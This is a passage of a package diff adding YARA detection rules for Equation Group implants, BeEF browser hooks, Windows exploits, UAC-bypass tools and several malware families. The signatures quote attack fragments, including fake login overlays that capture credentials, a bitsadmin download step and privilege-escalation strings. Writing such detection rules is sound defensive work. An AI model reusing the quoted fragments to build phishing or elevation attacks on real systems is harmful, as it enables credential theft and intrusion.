+		date = "2015/02/16"
+		hash = "4ce6e77a11b443cc7cbe439b71bf39a39d3d7fa3"
+	strings:
+		$mz = { 4d 5a }
+
+		$x1 = "Original Innovations, LLC" fullword wide
+		$x2 = "Moniter Resource Protocol" fullword wide
+		$x3 = "ahlhcib.dll" fullword wide
+
+		$s0 = "hnetcfg.HNetGetSharingServicesPage" fullword ascii
+		$s1 = "hnetcfg.IcfGetOperationalMode" fullword ascii
+		$s2 = "hnetcfg.IcfGetDynamicFwPorts" fullword ascii
+		$s3 = "hnetcfg.HNetFreeFirewallLoggingSettings" fullword ascii
+		$s4 = "hnetcfg.HNetGetShareAndBridgeSettings" fullword ascii
+		$s5 = "hnetcfg.HNetGetFirewallSettingsPage" fullword ascii
+	condition:
+		( $mz at 0 ) and filesize < 50000 and ( all of ($x*) and all of ($s*) )
+}
+
+/* Rule generated from the mentioned keywords */
+
+rule Equation_Kaspersky_SuspiciousString {
+	meta:
+		description = "Equation Group Malware - suspicious string found in sample"
+		author = "Florian Roth"
+		reference = "http://goo.gl/ivt8EW"
+		date = "2015/02/17"
+		score = 60
+	strings:
+		$mz = { 4d 5a }
+
+		$s1 = "i386\\DesertWinterDriver.pdb" fullword
+		$s2 = "Performing UR-specific post-install..."
+		$s3 = "Timeout waiting for the \"canInstallNow\" event from the implant-specific EXE!"
+		$s4 = "STRAITSHOOTER30.exe"
+		$s5 = "standalonegrok_2.1.1.1"
+		$s6 = "c:\\users\\rmgree5\\"
+	condition:
+		( $mz at 0 ) and filesize < 500000 and all of ($s*)
+}
+
+/* EquationDrug Update 11.03.2015 - http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/ */
+
+rule EquationDrug_NetworkSniffer1 {
+	meta:
+		description = "EquationDrug - Backdoor driven by network sniffer - mstcp32.sys, fat32.sys"
+		author = "Florian Roth @4nc4p"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		date = "2015/03/11"
+		hash = "26e787997a338d8111d96c9a4c103cf8ff0201ce"
+	strings:
+		$s0 = "Microsoft(R) Windows (TM) Operating System" fullword wide
+		$s1 = "\\Registry\\User\\CurrentUser\\" fullword wide
+		$s3 = "sys\\mstcp32.dbg" fullword ascii
+		$s7 = "mstcp32.sys" fullword wide
+		$s8 = "p32.sys" fullword ascii
+		$s9 = "\\Device\\%ws_%ws" fullword wide
+		$s10 = "\\DosDevices\\%ws" fullword wide
+		$s11 = "\\Device\\%ws" fullword wide
+	condition:
+		all of them
+}
+
+rule EquationDrug_CompatLayer_UnilayDLL {
+	meta:
+		description = "EquationDrug - Unilay.DLL"
+		author = "Florian Roth @4nc4p"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		date = "2015/03/11"
+		hash = "a3a31937956f161beba8acac35b96cb74241cd0f"
+	strings:
+		$mz = { 4d 5a }
+		$s0 = "unilay.dll" fullword ascii
+	condition:
+		( $mz at 0 ) and $s0
+}
+
+rule EquationDrug_HDDSSD_Op {
+	meta:
+		description = "EquationDrug - HDD/SSD firmware operation - nls_933w.dll"
+		author = "Florian Roth @4nc4p"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		date = "2015/03/11"
+		hash = "ff2b50f371eb26f22eb8a2118e9ab0e015081500"
+	strings:
+		$s0 = "nls_933w.dll" fullword ascii
+	condition:
+		all of them
+}
+
+rule EquationDrug_NetworkSniffer2 {
+	meta:
+		description = "EquationDrug - Network Sniffer - tdip.sys"
+		author = "Florian Roth @4nc4p"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		date = "2015/03/11"
+		hash = "7e3cd36875c0e5ccb076eb74855d627ae8d4627f"
+	strings:
+		$s0 = "Microsoft(R) Windows (TM) Operating System" fullword wide
+		$s1 = "IP Transport Driver" fullword wide
+		$s2 = "tdip.sys" fullword wide
+		$s3 = "sys\\tdip.dbg" fullword ascii
+		$s4 = "dip.sys" fullword ascii
+		$s5 = "\\Device\\%ws_%ws" fullword wide
+		$s6 = "\\DosDevices\\%ws" fullword wide
+		$s7 = "\\Device\\%ws" fullword wide
+	condition:
+		all of them
+}
+
+rule EquationDrug_NetworkSniffer3 {
+	meta:
+		description = "EquationDrug - Network Sniffer - tdip.sys"
+		author = "Florian Roth @4nc4p"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		date = "2015/03/11"
+		hash = "14599516381a9646cd978cf962c4f92386371040"
+	strings:
+		$s0 = "Corporation. All rights reserved." fullword wide
+		$s1 = "IP Transport Driver" fullword wide
+		$s2 = "tdip.sys" fullword wide
+		$s3 = "tdip.pdb" fullword ascii
+	condition:
+		all of them
+}
+
+rule EquationDrug_VolRec_Driver {
+	meta:
+		description = "EquationDrug - Collector plugin for Volrec - msrstd.sys"
+		author = "Florian Roth @4nc4p"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		date = "2015/03/11"
+		hash = "ee2b504ad502dc3fed62d6483d93d9b1221cdd6c"
+	strings:
+		$s0 = "msrstd.sys" fullword wide
+		$s1 = "msrstd.pdb" fullword ascii
+		$s2 = "msrstd driver" fullword wide
+	condition:
+		all of them
+}
+
+rule EquationDrug_KernelRootkit {
+	meta:
+		description = "EquationDrug - Kernel mode stage 0 and rootkit (Windows 2000 and above) - msndsrv.sys"
+		author = "Florian Roth @4nc4p"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		date = "2015/03/11"
+		hash = "597715224249e9fb77dc733b2e4d507f0cc41af6"
+	strings:
+		$s0 = "Microsoft(R) Windows (TM) Operating System" fullword wide
+		$s1 = "Parmsndsrv.dbg" fullword ascii
+		$s2 = "\\Registry\\User\\CurrentUser\\" fullword wide
+		$s3 = "msndsrv.sys" fullword wide
+		$s5 = "\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Control\\Windows" fullword wide
+		$s6 = "\\Device\\%ws_%ws" fullword wide
+		$s7 = "\\DosDevices\\%ws" fullword wide
+		$s9 = "\\Device\\%ws" fullword wide
+	condition:
+		all of them
+}
+
+rule EquationDrug_Keylogger {
+	meta:
+		description = "EquationDrug - Key/clipboard logger driver - msrtvd.sys"
+		author = "Florian Roth @4nc4p"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		date = "2015/03/11"
+		hash = "b93aa17b19575a6e4962d224c5801fb78e9a7bb5"
+	strings:
+		$s0 = "\\registry\\machine\\software\\Microsoft\\Windows NT\\CurrentVersion" fullword wide
+		$s2 = "\\registry\\machine\\SYSTEM\\ControlSet001\\Control\\Session Manager\\En" wide
+		$s3 = "\\DosDevices\\Gk" fullword wide
+		$s5 = "\\Device\\Gk0" fullword wide
+	condition:
+		all of them
+}
+
+rule EquationDrug_NetworkSniffer4 {
+	meta:
+		description = "EquationDrug - Network-sniffer/patcher - atmdkdrv.sys"
+		author = "Florian Roth @4nc4p"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		date = "2015/03/11"
+		hash = "cace40965f8600a24a2457f7792efba3bd84d9ba"
+	strings:
+		$s0 = "Copyright 1999 RAVISENT Technologies Inc." fullword wide
+		$s1 = "\\systemroot\\" fullword ascii
+		$s2 = "RAVISENT Technologies Inc." fullword wide
+		$s3 = "Created by VIONA Development" fullword wide
+		$s4 = "\\Registry\\User\\CurrentUser\\" fullword wide
+		$s5 = "\\device\\harddiskvolume" fullword wide
+		$s7 = "ATMDKDRV.SYS" fullword wide
+		$s8 = "\\Device\\%ws_%ws" fullword wide
+		$s9 = "\\DosDevices\\%ws" fullword wide
+		$s10 = "CineMaster C 1.1 WDM Main Driver" fullword wide
+		$s11 = "\\Device\\%ws" fullword wide
+		$s13 = "CineMaster C 1.1 WDM" fullword wide
+	condition:
+		all of them
+}
+
+rule EquationDrug_PlatformOrchestrator {
+	meta:
+		description = "EquationDrug - Platform orchestrator - mscfg32.dll, svchost32.dll"
+		author = "Florian Roth @4nc4p"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		date = "2015/03/11"
+		hash = "febc4f30786db7804008dc9bc1cebdc26993e240"
+	strings:
+		$s0 = "SERVICES.EXE" fullword wide
+		$s1 = "\\command.com" fullword wide
+		$s2 = "Microsoft(R) Windows (TM) Operating System" fullword wide
+		$s3 = "LSASS.EXE" fullword wide
+		$s4 = "Windows Configuration Services" fullword wide
+		$s8 = "unilay.dll" fullword ascii
+	condition:
+		all of them
+}
+
+rule EquationDrug_NetworkSniffer5 {
+	meta:
+		description = "EquationDrug - Network-sniffer/patcher - atmdkdrv.sys"
+		author = "Florian Roth @4nc4p"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		date = "2015/03/11"
+		hash = "09399b9bd600d4516db37307a457bc55eedcbd17"
+	strings:
+		$s0 = "Microsoft(R) Windows (TM) Operating System" fullword wide
+		$s1 = "\\Registry\\User\\CurrentUser\\" fullword wide
+		$s2 = "atmdkdrv.sys" fullword wide
+		$s4 = "\\Device\\%ws_%ws" fullword wide
+		$s5 = "\\DosDevices\\%ws" fullword wide
+		$s6 = "\\Device\\%ws" fullword wide
+	condition:
+		all of them
+}
+
+rule EquationDrug_FileSystem_Filter {
+	meta:
+		description = "EquationDrug - Filesystem filter driver – volrec.sys, scsi2mgr.sys"
+		author = "Florian Roth @4nc4p"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		date = "2015/03/11"
+		hash = "57fa4a1abbf39f4899ea76543ebd3688dcc11e13"
+	strings:
+		$s0 = "volrec.sys" fullword wide
+		$s1 = "volrec.pdb" fullword ascii
+		$s2 = "Volume recognizer driver" fullword wide
+	condition:
+		all of them
+}
+rule apt_equation_keyword {
+    meta:
+        description = "Rule to detect Equation group's keyword in executable file"
+        author = "Florian Roth @4nc4p"
+        last_modified = "2015-09-26"
+        reference = "http://securelist.com/blog/research/68750/equation-the-death-star-of-malware-galaxy/"
+    strings:
+         $a1 = "Backsnarf_AB25" wide
+         $a2 = "Backsnarf_AB25" ascii
+    condition:
+         uint16(0) == 0x5a4d and 1 of ($a*)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/EXPERIMENTAL_Beef_Hooked.yar remnux-rules-0.0.4/yara/malware/EXPERIMENTAL_Beef_Hooked.yar
--- remnux-rules-0.0.3/yara/malware/EXPERIMENTAL_Beef_Hooked.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/EXPERIMENTAL_Beef_Hooked.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,41 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+/*
+	This Yara Rule is to be considered as "experimental"
+	It reperesents a first attempt to detect BeEF hook function in memory
+	It still requires further refinement 
+
+*/
+
+rule BeEF_browser_hooked {
+	meta:
+		description = "Yara rule related to hook.js, BeEF Browser hooking capability"
+		author = "Pasquale Stirparo"
+		date = "2015-10-07"
+		hash1 = "587e611f49baf63097ad2421ad0299b7b8403169ec22456fb6286abf051228db"
+	strings:
+		$s0 = "mitb.poisonAnchor" wide ascii
+		$s1 = "this.request(this.httpproto" wide ascii
+		$s2 = "beef.logger.get_dom_identifier" wide ascii
+		$s3 = "return (!!window.opera" wide ascii 
+		$s4 = "history.pushState({ Be:\"EF\" }" wide ascii 
+		$s5 = "window.navigator.userAgent.match(/Opera\\/9\\.80.*Version\\/10\\./)" wide ascii 
+		$s6 = "window.navigator.userAgent.match(/Opera\\/9\\.80.*Version\\/11\\./)" wide ascii 
+		$s7 = "window.navigator.userAgent.match(/Avant TriCore/)" wide ascii 
+		$s8 = "window.navigator.userAgent.match(/Iceweasel" wide ascii 
+		$s9 = "mitb.sniff(" wide ascii 
+		$s10 = "Method XMLHttpRequest.open override" wide ascii 
+		$s11 = ".browser.hasWebSocket" wide ascii 
+		$s12 = ".mitb.poisonForm" wide ascii 
+		$s13 = "resolved=require.resolve(file,cwd||" wide ascii 
+		$s14 = "if (document.domain == domain.replace(/(\\r\\n|\\n|\\r)/gm" wide ascii 
+		$s15 = "beef.net.request" wide ascii 
+		$s16 = "uagent.search(engineOpera)" wide ascii 
+		$s17 = "mitb.sniff" wide ascii
+		$s18 = "beef.logger.start" wide ascii
+	condition:
+		all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/EXPERIMENTAL_Beef_pretty_theft.yar remnux-rules-0.0.4/yara/malware/EXPERIMENTAL_Beef_pretty_theft.yar
--- remnux-rules-0.0.3/yara/malware/EXPERIMENTAL_Beef_pretty_theft.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/EXPERIMENTAL_Beef_pretty_theft.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,42 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+/*
+	Yara Rule Set
+	Author: Pasquale Stirparo
+	Date: 2015-10-08
+	Identifier: src_ptheft
+*/
+
+/* Rule Set ----------------------------------------------------------------- */
+
+rule src_ptheft_command {
+	meta:
+		description = "Auto-generated rule - file command.js"
+		author = "Pasquale Stirparo"
+		reference = "not set"
+		date = "2015-10-08"
+		hash = "49c0e5400068924ff87729d9e1fece19acbfbd628d085f8df47b21519051b7f3"
+	strings:
+		$s0 = "var lilogo = 'http://content.linkedin.com/etc/designs/linkedin/katy/global/clientlibs/img/logo.png';" fullword wide ascii /* score: '38.00' */
+		$s1 = "dark=document.getElementById('darkenScreenObject'); " fullword wide ascii /* score: '21.00' */
+		$s2 = "beef.execute(function() {" fullword wide ascii /* score: '21.00' */
+		$s3 = "var logo  = 'http://www.youtube.com/yt/brand/media/image/yt-brand-standard-logo-630px.png';" fullword wide ascii /* score: '32.42' */
+		$s4 = "description.text('Enter your Apple ID e-mail address and password');" fullword wide ascii /* score: '28.00' */
+		$s5 = "sneakydiv.innerHTML= '<div id=\"edge\" '+edgeborder+'><div id=\"window_container\" '+windowborder+ '><div id=\"title_bar\" ' +ti" wide ascii /* score: '28.00' */
+		$s6 = "var logo  = 'https://www.yammer.com/favicon.ico';" fullword wide ascii /* score: '27.42' */
+		$s7 = "beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer);" fullword wide ascii /* score: '26.00' */
+		$s8 = "var title = 'Session Timed Out <img src=\"' + lilogo + '\" align=right height=20 width=70 alt=\"LinkedIn\">';" fullword wide ascii /* score: '24.00' */
+		$s9 = "var title = 'Session Timed Out <img src=\"' + logo + '\" align=right height=20 width=70 alt=\"YouTube\">';" fullword wide ascii /* score: '24.00' */
+		$s10 = "var title = 'Session Timed Out <img src=\"' + logo + '\" align=right height=24 width=24 alt=\"Yammer\">';" fullword wide ascii /* score: '24.00' */
+		$s11 = "var logobox = 'style=\"border:4px #84ACDD solid;border-radius:7px;height:45px;width:45px;background:#ffffff\"';" fullword wide ascii /* score: '21.00' */
+		$s12 = "sneakydiv.innerHTML= '<br><img src=\\''+imgr+'\\' width=\\'80px\\' height\\'80px\\' /><h2>Your session has timed out!</h2><p>For" wide ascii /* score: '23.00' */
+		$s13 = "inner.append(title, description, user,password);" fullword wide ascii /* score: '23.00' */
+		$s14 = "sneakydiv.innerHTML= '<div id=\"window_container\" '+windowborder+ '><div id=\"windowmain\" ' +windowmain+ '><div id=\"title_bar" wide ascii /* score: '23.00' */
+		$s15 = "sneakydiv.innerHTML= '<div id=\"window_container\" '+windowborder+ '><div id=\"windowmain\" ' +windowmain+ '><div id=\"title_bar" wide ascii /* score: '23.00' */
+		$s16 = "answer = document.getElementById('uname').value+':'+document.getElementById('pass').value;" fullword wide ascii /* score: '22.00' */
+		$s17 = "password.keydown(function(event) {" fullword wide ascii /* score: '21.01' */
+	condition:
+		13 of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/exploit_cve_2015_1701.yar remnux-rules-0.0.4/yara/malware/exploit_cve_2015_1701.yar
--- remnux-rules-0.0.3/yara/malware/exploit_cve_2015_1701.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/exploit_cve_2015_1701.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,30 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+rule CVE_2015_1701_Taihou {
+	meta:
+		description = "CVE-2015-1701 compiled exploit code"
+		author = "Florian Roth"
+		reference = "http://goo.gl/W4nU0q"
+		date = "2015-05-13"
+		hash1 = "90d17ebd75ce7ff4f15b2df951572653efe2ea17"
+		hash2 = "acf181d6c2c43356e92d4ee7592700fa01e30ffb"
+		hash3 = "b8aabe12502f7d55ae332905acee80a10e3bc399"
+		hash4 = "d9989a46d590ebc792f14aa6fec30560dfe931b1"
+		hash5 = "63d1d33e7418daf200dc4660fc9a59492ddd50d9"
+		score = 70
+	strings:	
+		$s3 = "VirtualProtect" fullword
+		$s4 = "RegisterClass"
+		$s5 = "LoadIcon"
+		$s6 = "PsLookupProcessByProcessId" fullword ascii 
+		$s7 = "LoadLibraryExA" fullword ascii
+		$s8 = "gSharedInfo" fullword
+
+		$w1 = "user32.dll" wide
+		$w2 = "ntdll" wide	
+	condition:
+		uint16(0) == 0x5a4d and filesize < 160KB and all of ($s*) and 1 of ($w*)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Exploit_CVE_2015_2426.yar remnux-rules-0.0.4/yara/malware/Exploit_CVE_2015_2426.yar
--- remnux-rules-0.0.3/yara/malware/Exploit_CVE_2015_2426.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Exploit_CVE_2015_2426.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,48 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+rule Exploit_MS15_077_078 {
+	meta:
+		description = "MS15-078 / MS15-077 exploit - generic signature"
+		author = "Florian Roth"
+		reference = "https://code.google.com/p/google-security-research/issues/detail?id=473&can=1&start=200"
+		date = "2015-07-21"
+		hash1 = "18e3e840a5e5b75747d6b961fca66a670e3faef252aaa416a88488967b47ac1c"
+		hash2 = "0b5dc030e73074b18b1959d1cf7177ff510dbc2a0ec2b8bb927936f59eb3d14d"
+		hash3 = "fc609adef44b5c64de029b2b2cff22a6f36b6bdf9463c1bd320a522ed39de5d9"
+		hash4 = "ad6bb982a1ecfe080baf0a2b27950f989c107949b1cf02b6e0907f1a568ece15"
+	strings:
+		$s1 = "GDI32.DLL" fullword ascii
+		$s2 = "atmfd.dll" fullword wide
+		$s3 = "AddFontMemResourceEx" fullword ascii
+		$s4 = "NamedEscape" fullword ascii
+		$s5 = "CreateBitmap" fullword ascii
+		$s6 = "DeleteObject" fullword ascii
+
+		$op0 = { 83 45 e8 01 eb 07 c7 45 e8 } /* Opcode */
+		$op1 = { 8d 85 24 42 fb ff 89 04 24 e8 80 22 00 00 c7 45 } /* Opcode */
+		$op2 = { eb 54 8b 15 6c 00 4c 00 8d 85 24 42 fb ff 89 44 } /* Opcode */
+		$op3 = { 64 00 88 ff 84 03 70 03 }
+	condition:
+		uint16(0) == 0x5a4d and filesize < 2000KB and all of ($s*) or all of ($op*)
+}
+
+rule Exploit_MS15_077_078_HackingTeam {
+	meta:
+		description = "MS15-078 / MS15-077 exploit - Hacking Team code"
+		author = "Florian Roth"
+		date = "2015-07-21"
+		super_rule = 1
+		hash1 = "ad6bb982a1ecfe080baf0a2b27950f989c107949b1cf02b6e0907f1a568ece15"
+		hash2 = "fc609adef44b5c64de029b2b2cff22a6f36b6bdf9463c1bd320a522ed39de5d9"
+	strings:
+		$s1 = "\\SystemRoot\\system32\\CI.dll" fullword ascii /* PEStudio Blacklist: strings */
+		$s2 = "\\sysnative\\CI.dll" fullword ascii /* PEStudio Blacklist: strings */
+		$s3 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" fullword ascii /* PEStudio Blacklist: strings */
+		$s4 = "CRTDLL.DLL" fullword ascii
+		$s5 = "\\sysnative" fullword ascii /* PEStudio Blacklist: strings */
+		$s6 = "InternetOpenA coolio, trying open %s" fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and filesize < 2500KB and all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/exploit_uac_elevators.yar remnux-rules-0.0.4/yara/malware/exploit_uac_elevators.yar
--- remnux-rules-0.0.3/yara/malware/exploit_uac_elevators.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/exploit_uac_elevators.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,135 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+rule Win7Elevatev2 {
+	meta:
+		description = "Detects Win7Elevate - Windows UAC bypass utility"
+		author = "Florian Roth"
+		reference = "http://www.pretentiousname.com/misc/W7E_Source/Win7Elevate_Inject.cpp.html"
+		date = "2015-05-14"
+		hash1 = "4f53ff6a04e46eda92b403faf42219a545c06c29" /* x64 */
+		hash2 = "808d04c187a524db402c5b2be17ce799d2654bd1" /* x86 */
+		score = 60
+	strings:
+		$x1 = "This program attempts to bypass Windows 7's default UAC settings to run " wide
+		$x2 = "Win7ElevateV2\\x64\\Release\\" ascii
+		$x3 = "Run the command normally (without code injection)" wide	
+		$x4 = "Inject file copy && elevate command" fullword wide
+		$x5 = "http://www.pretentiousname.com/misc/win7_uac_whitelist2.html" fullword wide
+		$x6 = "For injection, pick any unelevated Windows process with ASLR on:" fullword wide
+		
+		$s1 = "\\cmd.exe" wide
+		$s2 = "runas" wide
+		$s3 = "explorer.exe" wide
+		$s4 = "Couldn't load kernel32.dll" wide
+		$s5 = "CRYPTBASE.dll" wide
+		$s6 = "shell32.dll" wide
+		$s7 = "ShellExecuteEx" ascii
+		$s8 = "COMCTL32.dll" ascii 
+		$s9 = "ShellExecuteEx" ascii
+		$s10 = "HeapAlloc" ascii
+	condition:
+		uint16(0) == 0x5a4d and ( 1 of ($x*) or all of ($s*) )
+}
+
+rule UACME_Akagi {
+	meta:
+		description = "Rule to detect UACMe - abusing built-in Windows AutoElevate backdoor"
+		author = "Florian Roth"
+		reference = "https://github.com/hfiref0x/UACME"
+		date = "2015-05-14"
+		hash1 = "edd2138bbd9e76c343051c6dc898054607f2040a"
+		hash2 = "e3a919ccc2e759e618208ededa8a543954d49f8a"
+		score = 60
+	strings:
+		$x1 = "UACMe injected, Fubuki at your service." wide fullword
+		$x3 = "%temp%\\Hibiki.dll" fullword wide
+		$x4 = "[UCM] Cannot write to the target process memory." fullword wide
+		
+		$s1 = "%systemroot%\\system32\\cmd.exe" wide
+		$s2 = "D:(A;;GA;;;WD)" wide
+		$s3 = "%systemroot%\\system32\\sysprep\\sysprep.exe" fullword wide
+		$s4 = "/c wusa %ws /extract:%%windir%%\\system32" fullword wide
+		$s5 = "Fubuki.dll" ascii fullword
+		
+		$l1 = "ntdll.dll" ascii
+		$l2 = "Cabinet.dll" ascii
+		$l3 = "GetProcessHeap" ascii
+		$l4 = "WriteProcessMemory" ascii
+		$l5 = "ShellExecuteEx" ascii
+	condition:
+		( 1 of ($x*) ) or ( 3 of ($s*) and all of ($l*) ) 
+}
+
+rule UACElevator {
+	meta:
+		description = "UACElevator bypassing UAC - file UACElevator.exe"
+		author = "Florian Roth"
+		reference = "https://github.com/MalwareTech/UACElevator"
+		date = "2015-05-14"
+		hash = "fd29d5a72d7a85b7e9565ed92b4d7a3884defba6"
+	strings:
+		$x1 = "\\UACElevator.pdb" ascii
+		
+		$s1 = "%userprofile%\\Downloads\\dwmapi.dll" fullword ascii
+		$s2 = "%windir%\\system32\\dwmapi.dll" fullword ascii
+		$s3 = "Infection module: %s" fullword ascii
+		$s4 = "Could not save module to %s" fullword ascii
+		$s5 = "%s%s%p%s%ld%s%d%s" fullword ascii
+		$s6 = "Stack area around _alloca memory reserved by this function is corrupted" fullword ascii
+		$s7 = "Stack around the variable '" fullword ascii
+		$s8 = "MSVCR120D.dll" fullword wide
+		$s9 = "Address: 0x" fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and filesize < 172KB and 
+			( $x1 or 8 of ($s*) )
+}
+
+rule s4u {
+	meta:
+		description = "Detects s4u executable which allows the creation of a cmd.exe with the context of any user without requiring the password. - file s4u.exe"
+		author = "Florian Roth"
+		reference = "https://github.com/aurel26/s-4-u-for-windows"
+		date = "2015-06-05"
+		hash = "cfc18f3d5306df208461459a8e667d89ce44ed77"
+		score = 50
+	strings:
+		// Specific strings (may change)
+		$x0 = "s4u.exe Domain\\Username [Extra SID]" fullword ascii 
+		$x1 = "\\Release\\s4u.pdb" ascii
+
+		// Less specific strings
+		$s0 = "CreateProcessAsUser failed (error %u)." fullword ascii 
+		$s1 = "GetTokenInformation failed (error: %u)." fullword ascii 
+		$s2 = "LsaLogonUser failed (error 0x%x)." fullword ascii 
+		$s3 = "LsaLogonUser: OK, LogonId: 0x%x-0x%x" fullword ascii 
+		$s4 = "LookupPrivilegeValue failed (error: %u)." fullword ascii 
+		$s5 = "The token does not have the specified privilege (%S)." fullword ascii 
+		$s6 = "Unable to parse command line." fullword ascii 
+		$s7 = "Unable to find logon SID." fullword ascii 
+		$s8 = "AdjustTokenPrivileges failed (error: %u)." fullword ascii
+		$s9 = "AdjustTokenPrivileges (%S): OK" fullword ascii 
+		
+		// Generic
+		$g1 = "%systemroot%\\system32\\cmd.exe" wide
+		$g2 = "SeTcbPrivilege" wide
+		$g3 = "winsta0\\default" wide
+		$g4 = ".rsrc"
+		$g5 = "HeapAlloc"
+		$g6 = "GetCurrentProcess"
+		$g7 = "HeapFree"
+		$g8 = "GetProcessHeap"
+		$g9 = "ExpandEnvironmentStrings"
+		$g10 = "ConvertStringSidToSid"
+		$g11 = "LookupPrivilegeValue"
+		$g12 = "AllocateLocallyUniqueId"
+		$g13 = "ADVAPI32.dll"
+		$g14 = "LsaLookupAuthenticationPackage"
+		$g15 = "Secur32.dll"
+		$g16 = "MSVCR120.dll"		
+
+	condition:
+		uint16(0) == 0x5a4d and filesize < 60KB and ( 1 of ($x*) or all of ($s*) or all of ($g*) ) 
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Ezcob.yar remnux-rules-0.0.4/yara/malware/Ezcob.yar
--- remnux-rules-0.0.3/yara/malware/Ezcob.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Ezcob.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,35 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule EzcobStrings : Ezcob Family
+{
+    meta:
+        description = "Ezcob Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-23"
+        
+    strings:
+        $ = "\x12F\x12F\x129\x12E\x12A\x12E\x12B\x12A\x12-\x127\x127\x128\x123\x12"
+        $ = "\x121\x12D\x128\x123\x12B\x122\x12E\x128\x12-\x12B\x122\x123\x12D\x12"
+        $ = "Ezcob" wide ascii
+        $ = "l\x12i\x12u\x122\x120\x121\x123\x120\x124\x121\x126"
+        $ = "20110113144935"
+        
+    condition:
+       any of them
+}
+
+rule Ezcob : Family
+{
+    meta:
+        description = "Ezcob"
+        author = "Seth Hardy"
+        last_modified = "2014-06-23"
+        
+    condition:
+        EzcobStrings
+}
diff -Nru remnux-rules-0.0.3/yara/malware/F0xy.yar remnux-rules-0.0.4/yara/malware/F0xy.yar
--- remnux-rules-0.0.3/yara/malware/F0xy.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/F0xy.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,21 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule ws_f0xy_downloader {
+  meta:
+    description = "f0xy malware downloader"
+    author = "Nick Griffin (Websense)"
+
+  strings:
+    $mz="MZ"
+    $string1="bitsadmin /transfer"
+    $string2="del rm.bat"
+    $string3="av_list="
+  
+  condition:
+    ($mz at 0) and (all of ($string*))
+}
diff -Nru remnux-rules-0.0.3/yara/malware/FakeM.yar remnux-rules-0.0.4/yara/malware/FakeM.yar
--- remnux-rules-0.0.3/yara/malware/FakeM.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/FakeM.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,64 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule HTMLVariant : FakeM Family HTML Variant
+{
+	meta:
+		description = "Identifier for html variant of FAKEM"
+		author = "Katie Kleemola"
+		last_updated = "2014-05-20"
+	
+	strings:
+		// decryption loop
+		$s1 = { 8B 55 08 B9 00 50 00 00 8D 3D ?? ?? ?? 00 8B F7 AD 33 C2 AB 83 E9 04 85 C9 75 F5 }
